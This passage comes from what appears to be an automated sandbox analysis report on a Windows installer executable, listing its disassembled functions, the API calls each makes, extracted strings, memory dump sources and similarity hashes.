                                                              • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                              • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                              Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                              • GetSysColor.USER32(?), ref: 00404494
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                              • lstrlenW.KERNEL32(?), ref: 004044B5
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                              • SendMessageW.USER32(00000000), ref: 00404537
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                              • SetCursor.USER32(00000000), ref: 004045B6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                              • SetCursor.USER32(00000000), ref: 004045D2
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: +C@$Call$N
                                                              • API String ID: 3103080414-3697844480
                                                              • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                              • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                              • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                              • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                              • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                              • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                              • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                              Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                              • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                              • wsprintfA.USER32 ref: 00405F4D
                                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                              • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                              • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                              • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                              Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-416954956
                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                              • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                              • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                              Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                              • GetSysColor.USER32(00000000), ref: 004042B7
                                                              • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                              • SetBkMode.GDI32(?,?), ref: 004042CF
                                                              • GetSysColor.USER32(?), ref: 004042E2
                                                              • SetBkColor.GDI32(?,?), ref: 004042F2
                                                              • DeleteObject.GDI32(?), ref: 0040430C
                                                              • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                              • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                              • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                              Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                              • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                              • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                              • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                              • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                              • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                              • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                              Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                              • GetMessagePos.USER32 ref: 00404BD3
                                                              • ScreenToClient.USER32(?,?), ref: 00404BED
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                              • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                              • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                              Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                              • MulDiv.KERNEL32(000F45F7,00000064,000F47FB), ref: 00402E20
                                                              • wsprintfW.USER32 ref: 00402E30
                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                              • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                              • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                              • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                              Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalFree.KERNEL32(?), ref: 1000256D
                                                              • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                              • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                              • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                              • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                              Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                              • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                              • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                              • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                              Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp$C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll
                                                              • API String ID: 3109718747-2723373905
                                                              • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                              • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                              • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                              • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                              Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
